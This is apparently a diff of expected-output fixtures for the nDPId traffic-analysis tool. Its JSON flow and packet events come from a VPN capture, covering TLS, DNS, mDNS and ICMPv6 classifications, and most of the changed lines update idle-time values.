+00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 
+01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}} +01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569687246891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569687246891,"pkt":"LH6BsEqhNDY7z3UoCABFAAAzrdgAAP8Ra2cKAADjS0tMTPaDADUAH3AoGBgBAAABAAAAAAAABWxvY2FsAAAGAAE="} 
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -87,8 +87,8 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569687247192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687247192,"pkt":"GIEORo7INDY7z3UoCABFAAEE6tAAAP8RumAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="} 00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"} -00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"} +00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"} 
+00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569687247596,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687247596,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} 
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
@@ -96,12 +96,12 @@ 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569687248005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1569687248005,"pkt":"AQBeAAD7GIEORo7ICABFAACszwUAAP8RAGsKAADV4AAA+xTpFOkAmDTQAAAAAAADAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMAAHADAAMAAEAAA4QABQRTFAtUktFUlVSLU9TWCAoOSnADAAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"} 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569687248006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1569687248006,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AJgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QCYj8YAAAAAAAMAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAwAAcAMAAwAAQAADhAAFBFMUC1SS0VSVVItT1NYICg5KcAMAAApBaAAABGUABIABAAOAJo6gQ5GjsgYgQ5Gjsg="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1569687248620,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687248620,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoT2EAAEAGMCYKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAogHcAAEAG\/w8KAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0NJhAADcGE+O4GThNCgAA4wBQ3jQaT2XuY8iogYAQAPO0OwAAAQEICuMU+IIcDWOU"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56917,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoT2EAAEAGMCYKAADjuBk4Td5VAFBor5ytCT1EPVAQEAlzBQAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687249612,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687249612,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.77","src_port":56884,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1569687249612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687249612,"pkt":"LH6BsEqhNDY7z3UoCABFAAAogHcAAEAG\/w8KAADjuBk4Td40AFBjyKiAGk9l7lAQEAA5gAAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0NJhAADcGE+O4GThNCgAA4wBQ3jQaT2XuY8iogYAQAPO0OwAAAQEICuMU+IIcDWOU"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1569687249631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687249631,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0uJpAADgGjuC4GThNCgAA4wBQ3lUJPUQ9aK+croAQAOvt6gAAAQEICuMU+IIcDWN7"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1569687251177,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1569687251177,"pkt":"LH6BsEqhNDY7z3UoCABFAAA+HQ0AAP8R\/CcKAADjS0tMTNZDADUAKtGSphcBAAABAAAAAAAABXByaW50BnZpYXNhdANjb20AAAEAAQ=="} 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687251177,"flow_last_seen":1569687251177,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1569687251177,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"print.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -112,29 +112,29 @@ 00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687255989,"flow_last_seen":1569687255989,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687255989,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1569687256018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569687256018,"pkt":"NDY7z3UoLH6BsEqhCABFAABHAABAADcRoSxLS0xMCgAA4wA14ysAM\/asjyeBgAABAAEAAAAABXNsYWNrA2NvbQAAAQABwAwAAQABAAAAIwAEY1YinA=="} 00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": 
